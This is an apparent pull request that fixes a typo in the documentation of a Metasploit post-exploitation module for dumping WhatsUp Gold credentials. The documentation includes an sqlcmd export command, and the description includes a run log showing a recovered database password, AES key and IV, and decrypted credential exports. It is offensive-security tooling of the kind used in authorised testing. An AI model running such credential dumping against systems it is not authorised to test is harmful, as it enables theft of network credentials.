### PR TITLE
Suggested changes for module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/whatsupgold_credential_dump.md
+++ b/documentation/modules/post/windows/gather/credentials/whatsupgold_credential_dump.md
@@ -98,7 +98,7 @@ WHERE
 
 Output must be encoded VARBINARY per above, and must be well-formed CSV (i.e. no trailing whitespace).
 If using `sqlcmd`, ensure the `-W` and `-I` parameters are included to strip trailing whitespace and
-allow quoted identifyers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
+allow quoted identifiers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
 the contents of `solarwinds_sql_query.sql` is the text of the SQL query above:
 
 `sqlcmd -d "<DBNAME>" -S <MSSQL_INSTANCE> -E -i sql_query.sql -o wug_dump.csv -h-1 -s"," -w 65535 -W -I`


### PR DESCRIPTION
This adds the suggested changes from the original Metasploit PR. Mostly just stylistic changes. This also sets the `Privileged` metadata to false. Please let me know if that should be changed back! Tested on the latest version:

```
msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > run

[*] Hostname DESKTOP-5JSUGC8 IPv4 192.168.140.171
[*] WhatsUp Gold Build 22.1.39
[*] Init WhatsUp Gold crypto ...
[+] WhatsUp Gold Serial Number: 7IAUF8K9I0Y5ID1
[+] WhatsUp Gold Dynamic Encryption Salt
[+] 	HEX: 91F8D3E78B5AD79E
[+] WhatsUp Gold Composed AES256
[+] 	KEY: 540B9632630122703ABE83CB4AA2528E796EEA533BDECE574481B00B99DC300A
[+] 	 IV: 2C480E5DDDE73C95294815C903D8B38C
[*] Init WhatsUp Gold SQL ...
[+] WhatsUp Gold SQL Database Connection Configuration:
[+] 	Instance Name: DESKTOP-5JSUGC8\WHATSUP
[+] 	Database Name: WhatsUp
[+] 	Database User: WhatsUpGold_DESKTOP-5JSUGC8
[+] 	Database Pass: 0x!19EtTDX3UoFXxIMB304ROQ
[*] Performing export of WhatsUp Gold SQL database to CSV file
[*] Export WhatsUp Gold DB ...
[+] 1 WUG rows exported, 1 unique nCredentialTypeIDs
[+] Encrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230223163057_default_192.168.140.171_whatsup_gold_enc_908051.txt
[*] Performing decryption of WhatsUp Gold SQL database
[+] 1 WUG rows loaded, 1 unique nCredentialTypeIDs
[*] Process WhatsUp Gold DB ...
[+] 1 WUG rows processed
[*] 1 rows recovered: 1 plaintext, 0 decrypted (0 blank)
[*] 1 rows written (0 blank rows withheld)
[+] 1 unique WUG nCredentialTypeID records recovered
[+] Decrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230223163057_default_192.168.140.171_whatsup_gold_dec_129006.txt
[*] Post module execution complete
```